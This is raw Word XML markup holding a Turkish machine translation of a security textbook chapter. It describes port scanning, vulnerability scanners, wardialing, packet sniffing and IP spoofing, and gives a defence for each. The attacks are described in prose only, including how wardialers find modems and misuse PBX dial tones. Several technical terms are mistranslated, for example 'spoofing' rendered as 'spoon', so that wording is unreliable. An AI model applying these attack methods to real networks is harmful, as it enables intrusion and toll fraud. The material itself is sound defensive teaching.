        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pP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Ağ Haritalama ve Port Tarama Savunmaları</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CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ağ eşlemesi ve port taramalarına karşı savunma yapmak için, yönetici tüm gereksiz sistemleri kaldırmalı ve kullanılmayan tüm portları kapatmalıdır. Bunu başarmak için, yönetici gereksiz hizmetleri makineden devre dışı bırakmalı ve kaldırmalıdır. Sadece mutlak, tanımlanmış bir işe sahip olan hizmetler çalışmalıdır. Bir güvenlik yöneticisi, gereksiz bağlantı noktalarının açık olup olmadığını belirlemek için sistemleri düzenli aralıklarla taramalıdır. Keşfedildiğinde, bu gereksiz bağlantı noktaları devre dışı bırakılmalıdır.</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Pr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Güvenlik açığı taraması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152"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Hedef sistemler bir port tarayıcı ve ağ eşleyici ile tanımlandıktan sonra, saldırgan mağdur makinelerde herhangi bir zayıf nokta olup olmadığını belirlemek için arama yapacaktır. Uzaktaki bir saldırganın bir makineye dokunmasını ya da tüm idari kontrolü ele geçirmesini sağlamak için binlerce güvenlik açığı keşfedildi. Bir saldırgan, her güvenlik açığını test etmek için bireysel komutlar girerek her bir sistemde bu güvenlik açıklarının her birini deneyebilir, ancak kapsamlı bir arama yapılması yıllar alabilir. Süreci hızlandırmak için saldırganlar, hedef üzerindeki güvenlik açıklarını hızla aramak için otomatik tarama araçlarını kullanı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 xml:space="preserve">Bu otomatik güvenlik açığı tarama araçları, esas olarak, veritabanını okuyabilen, bir makineye bağlanabilen ve istismara karşı savunmasız olup olmadığını kontrol eden bir motorla iyi bilinen güvenlik açıklarının veritabanlarıdır. Aracın güvenlik açıklarını keşfetmedeki etkinliği, güvenlik </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>açığı veritabanının kalitesine ve eksiksizliğine bağlıdır. Bu nedenle, en iyi güvenlik açığı tarayıcıları, güvenlik açığı veritabanının hızlı bir şekilde yayımlanmasını ve güncelleştirilmesini ve bir komut dosyası dili kullanarak yeni denetimler oluşturma yeteneğini destekle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Yüksek kaliteli ticari güvenlik açığı tarama araçları yaygın olarak bulunmaktadır ve güvenlik uygulayıcıları ve saldırganlar tarafından güvenlik açıklarını aramak için sıklıkla kullanılır. Ücretsiz cephede, SATAN (Ağı Analiz Etmek İçin Güvenlik Yöneticisi Aracı), 1995 yılında tanıtılan ilk yaygın olarak dağıtılan otomatik güvenlik açığı tarayıcılarından biriydi. Nessus, http: //www.nessus.org. Renaud Deraison tarafından yürütülen Nessus projesi, uzak sistemlerdeki zayıf noktaları tespit etmek için tam özellikli bir tarayıcı sunuyor. Yeni güvenlik açığı kontrolleri yazmak için kaynak kodunu ve bir komut dili içerir ve güvenlik uygulayıcıları ve saldırganlar tarafından özelleştirilmesine olanak tanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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Nessus, genel amaçlı bir güvenlik açığı tarayıcısı olsa da, çok sayıda sistem ve platformda delik ararken, bazı güvenlik açığı tarayıcıları belirli sistem türlerine daha fazla odaklanır. Örneğin, Whisker, Web sunucusu CGI komut dosyalarına odaklanan tam özellikli bir güvenlik açığı tarama aracıdır. Rain Forest Puppy tarafından yazılan Whisker, http://www.wiretrip.net/rfp adresinde bulunabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Güvenlik Açığı Tarama Savunmaları </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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Yukarıda açıklandığı gibi, yöneticinin kullanılmayan bağlantı noktalarını kapatması gerekir. Ek olarak, sistem güvenlik açıklarının büyük bölümünü ortadan kaldırmak için, sistem yamalarının zamanında uygulanması gerekir. Bilgisayar kullanan tüm kuruluşlar, sistem yamalarının ne zaman ve nasıl güncel tutulacağını belirleyen belirlenmiş bir değişiklik kontrol prosedürüne sahip olmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Güvenlik uygulayıcıları ayrıca, saldırganlar yapmadan önce kendi güvenlik ağlarında periyodik güvenlik açığı taraması yapmalıdır. Bu taramalar düzenli olarak (hassas ağlar için üç ayda bir veya hatta aylık olarak) veya büyük ağ değişiklikleri uygulandığında yapılmalıdır. Keşfedilen güvenlik açıkları, sistem yapılandırmalarını güncelleyerek veya yamalar uygulayarak zamanında ele alınmalıdır.</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Wardialing</w:t>
      </w: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Ağ haritalayıcısı ve tarayıcısının kuzeni, bir telefon ağı üzerindeki hedef sistemleri keşfetmek için bir savaş aracıdır. Kuruluşlar, ağlarını güvenlik duvarı, izinsiz giriş algılama sistemi ve güvenli bir DMZ uygulayarak, Internet üzerinden yapılan tam ve ön saldırılardan korumak için büyük miktarda para harcarlar. Ne yazık ki, birçok saldırgan bu rotayı önler ve bunun yerine ağa giden başka yolları arar. Kullanıcıların masaüstünde veya eski, unutulmuş makinelerde bırakılan modemler genellikle bir hedef ağa girmenin en kolay yolunu sağla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Aynı zamanda “iblis çeviricileri” olarak da bilinen savaşçılar, kurban ağındaki modemleri bulmaya çalışan bir dizi telefon numarasını çeviriyor. Saldırgan, hedef kuruluşla ilişkili telefon uzantılarını belirleyecektir. Bu bilgiler genellikle telefon rehberini, imza hattındaki telefon iletişim bilgilerini içeren çalışan haber grubu kayıtlarını ve hatta genel çalışan e-postasını listeleyen bir Web sitesinden toplanır. Bir veya bir dizi telefon numarası ile donanmış olan saldırgan, orijinal numara ile ilişkilendirilmiş olan savaş arama aracına girecektir (örneğin, bir haber grubundaki bir çalışanın telefon numarası 555-1212 olarak listelenirse, saldırgan arama yapacak. 555-XXXX). Wardialer, her numarayı otomatik olarak arayacak, bir modem taşıyıcı tonunun tanıdık yoldaşını dinleyecek ve modem dinleyen tüm telefon numaralarının bir listesini yapacaktı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Saldırganın ürettiği modemlerin listesi ile saldırgan, keşfedilen her modemi bir terminal programı veya başka bir istemci kullanarak arayacaktır. Modeme bağlandıktan sonra, saldırgan afiş bilgilerini temel alarak sistemi tanımlamaya ve bir şifre gerekip gerekmediğine bakmaya çalışacaktır. Genellikle, şifre gerekmez, çünkü modem, saatlerce erişim gerektiren ve onaylanmış yöntemleri kullanarak zahmet etmek istemeyen bir ipucu olmayan kullanıcı tarafından yerine yerleştirilmiştir. Bir şifre gerekirse, saldırgan genellikle platformla veya şirketle ilişkilendirilen şifreleri tahmin etmeye çalışır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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xml:space="preserve">Bazı wardialing araçları ayrıca modemleri tespit etme yeteneğinin yanı sıra tekrarlanan bir çevir sesi bulma özelliğini de destekler. Yinelenen çevir sesi, saldırgan için harika bir şey çünkü bir kurbanın PBX sisteminden dünyanın herhangi bir yerine sınırsız şekilde arama yapabiliyor. Eğer bir saldırgan aynı yerel arama alış verişinde tekrar arama tonunu destekleyen PBX'e bir hat </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>eklerse, saldırgan mağdurun PBX ile kurban tarafından ödenen tüm telefon faturaları ile uluslararası wardialing yapabil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Günümüzde mevcut olan en eksiksiz işlevsel wardialing aracı, Hacker’in Seçimi (THC) grubu tarafından dağıtılmaktadır. THC-Scan olarak bilinen bu araç Van Hauser tarafından yazılmıştır ve http://inferno.tusculum.edu/thc adresinde bulunabilir. THC-Scan 2.0, sıralı veya rasgele arama, ağ üzerinden arama, modem taşıyıcı ve tekrar arama tonu algılama ve ilkel algılama önleme yetenekleri gibi birçok gelişmiş özelliği destekler.</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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Wardialing Savunmaları </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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Wardialing saldırılarına karşı en iyi savunma, belirlenmiş bir iş ihtiyacı olmadan modemlerin ve gelen hatların kullanımını yasaklayan güçlü bir modem politikasıdır. Politika ayrıca, tüm modemlerin bir iş gereksinimi olan merkezi bir veritabanına kaydedilmesini, yalnızca bir güvenlik veya sistem yöneticisi tarafından erişilmesini de gerektirmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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Ek olarak, güvenlik personeli, saldırganlardan önce modemleri bulmak için kendi ağlarının periyodik wardialing egzersizlerini yapmalıdır. Kayıtsız modeme sahip bir telefon numarası bulunduğunda, fiziksel cihaz bulunmalı ve devre dışı bırakılmalıdır. Bu tür aygıtları bulmak zor olsa da, ağ savunucuları saldırganın yapmadan önce bu yenilenen modemleri bulmasına bağlı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152"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CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ağ Kullanımları: Snifing, Spooing ve Seans Hijacking</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CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İnterneti oluşturan temel protokol paketi olan TCP / IP, başlangıçta güvenlik hizmeti verecek şekilde tasarlanmamıştır. Aynı şekilde, TCP / IP, Ethernet ile kullanılan en yaygın veri bağlantı tipi temelde güvensizdir. Temel protokollerin bu açıkları göz önüne alındığında, bir dizi saldırı mümkündür.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bu ağ açıklarına bağlı olarak en yaygın şekilde kullanılan ve potansiyel olarak zarar verebilecek saldırılar, tehdit, göz atma ve oturum ele geçirmedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Snifting </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009F5F66" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>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color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sniffers, bir saldırgan için son derece yararlı bir araçtır ve bu nedenle bir saldırganın araç testinin temel bir unsurudur. Sniffers bir saldırganın ağdan geçen verileri izlemesine izin verir. Ağ trafiğini izleme kabiliyetleri göz önüne alındığında, koklayıcılar, güvenlik pratisyenleri ve ağ yöneticileri için ağ sorunlarını giderme ve araştırmaları yürütmede de faydalıdır. Sniffers, Token Ring ve özellikle Ethernet dahil olmak üzere çeşitli veri bağlantı teknolojilerinin özelliklerinden yararlanı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En yaygın LAN teknolojisi olan Ethernet, temel olarak bir yayın teknolojisidir. Ethernet LAN'ları hub'lar kullanılarak oluşturulduğunda, LAN'a bağlı tüm makineler LAN segmentindeki tüm verileri izleyebilir. Kullanıcı kimlikleri, şifreler veya diğer hassas bilgiler aynı makinedeki bir makineden (örneğin bir istemci) başka bir makineye (örneğin bir sunucu veya yönlendirici) aynı LAN üzerinden gönderilirse, LAN'a bağlı diğer tüm sistemler verileri izleyebilir. Sniffer, tüm verileri bir LAN segmentinde toplayan bir donanım veya yazılım aracıdır. Bir algılayıcı, sistem tarafından geçen tüm ağ trafiğini toplayan bir makinede çalışırken, Ethernet arayüzünün ve makinenin kendisinin “karışık modda” olduğu söylen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Telnet, FTP, POP (e-posta için kullanılan Sonrası Protokolü) ve hatta bazı Web uygulamaları gibi yaygın olarak kullanılan uygulamalar şifrelerini ve hassas verilerini şifreleme olmadan iletir. Bir yayın Ethernet segmentindeki herhangi bir saldırgan, bu şifreleri ve verileri toplamak için bir sniffer kullanabil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Bir sistemi ele geçiren saldırganlar, genellikle tehlikeye atılan makineye bir yazılım algılayıcı yüklerler. Bu algılayıcı, saldırgan için bir nöbetçi gibi davranarak, tehlikeye atılan sistem tarafından hareket eden hassas verileri toplar. Sniffer, şifreleri içeren bu verileri toplar ve yerel bir dosyada saklar veya saldırgana iletir. Saldırgan daha sonra bu bilgileri giderek daha fazla sistemi tehlikeye atmak için kullanır. Bir tehlikeye maruz kalmış bir makineye bir sniffer takma, bu makineden geçen verileri toplama ve diğer sistemleri ele geçirmek için sniffed bilgileri kullanma saldırısı metoduna ada atlamalı saldırı denir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">İnternet üzerinde çok sayıda kesme aleti bulunmaktadır. En eksiksiz işlevsel kesme araçları, snift (Brecht Claerhout tarafından  http://reptile.rug.ac.be/~coder/snifﬁt/snifﬁt.html adresinde bulunabilir) ve Snort (Martin Roesch tarafından  http://www.clark.net/~roesch/security.html). Bazı işletim sistemleri, varsayılan olarak, özellikle Solaris (snoop aracıyla) ve bazı Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(tcpdump ile birlikte gelen) Linux türleri ile birlikte gelir. Diğer ticari koklayıcılar da çeşitli satıcılardan temin edilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Snifing Savunma</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CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Snifing saldırılarına karşı en iyi savunma, aktarılan verileri şifrelemektir. Parolaları veya diğer hassas verileri açık metin olarak göndermek yerine, uygulama veya ağ verileri şifrelemelidir (SSH, güvenli Telnet vb.).</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Koklayıcılara karşı bir diğer savunma Ethernet'in yayın yapısını ortadan kaldırmaktır. LAN oluşturmak için bir hub yerine bir anahtar kullanılarak, bir sniffer ile yapılabilecek hasar sınırlıdır. Bir anahtar, anahtardaki yalnızca gerekli kaynak ve hedef portlar trafiği taşıyacak şekilde yapılandırılabilir. Aynı LAN üzerinde olmasına rağmen, anahtardaki diğer tüm bağlantı noktaları (ve bu bağlantı noktalarına bağlı makineler) bu verileri görmez. Bu nedenle, bir sistemde LAN üzerinde bir tehlike varsa, bu makineye yüklenen bir sniffer, LAN üzerindeki diğer makineler arasında değiş tokuş edilen verileri göremez. Anahtarlar bu nedenle, bir nişancının toplayabileceği verileri en aza indirerek güvenliği arttırmada ve ayrıca ağ performansını iyileştirmeye yardımcı olur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>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IP Spooﬁng</w:t>
      </w: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Başka bir ağ tabanlı saldırı, saldırganı gizlemek ve zayıf kimlik doğrulama yöntemlerinden yararlanmak için bilgisayarın kaynak adresini değiştirmeyi içerir. IP adresi atma, saldırganın saldırı yapmak için başka bir makinenin IP adresini kullanmasına izin verir. Hedef makineler kimlik doğrulaması için IP adresine güveniyorsa, IP taraması sisteme saldırgana erişim verebilir. Ek olarak, IP casusluğu bir saldırganın yakalanmasını çok zorlaştırabilir çünkü günlükler saldırının asıl kaynağını değil, yem adreslerini içerecektir. Bu bölümün diğer bölümlerinde açıklanan araçların çoğu, saldırının gerçek kaynağını gizlemek için IP taramasına dayanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Kaşık Savunması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>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Sistemler kimlik doğrulama için IP adreslerini kullanmamalıdır. Kimlik doğrulaması için yalnızca IP adresine dayanan işlevler veya uygulamalar devre dışı bırakılmalı veya değiştirilmelidir. UNIX'de “r-komutları” (rlogin, rsh, rexec ve rcp) bilinen bir şekilde IP casusluk saldırılarına maruz kalmaktadır. UNIX güven ilişkileri, yöneticinin bir şifre sağlamadan r-komutlarını kullanarak sistemleri yönetmesini sağlar. Parola yerine, sistemin IP adresi kimlik doğrulama için kullanılır. Bu büyük zayıflık, r-komutlarını güçlü kimlik doğrulama kullanan yönetim araçlarıyla değiştirmek suretiyle önlenmelidir. Böyle bir araç, güvenli kabuk (ssh), r komutlarının zayıf kimlik doğrulamasını değiştirmek için güçlü şifreleme kullanır. Benzer şekilde, kritik güvenlik ve yönetim fonksiyonları için IP adreslerine dayanan diğer tüm uygulamalar değiştirilmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pP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Ek olarak, bir kuruluş, çevreyi ağlarına, organizasyonu İnternet'e ve iş ortaklarına bağlayan sızdırma önleyici filtreler yerleştirmelidir. Anti-spoof filtreleri, içeriden geldiğini iddia ederek ağ dışından gelen tüm trafiği azaltır. Bu özellik sayesinde, bu tür filtreler bazı türden saldırı saldırılarını önleyebilir ve tüm çevre ağ yönlendiricilerinde uygulanmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
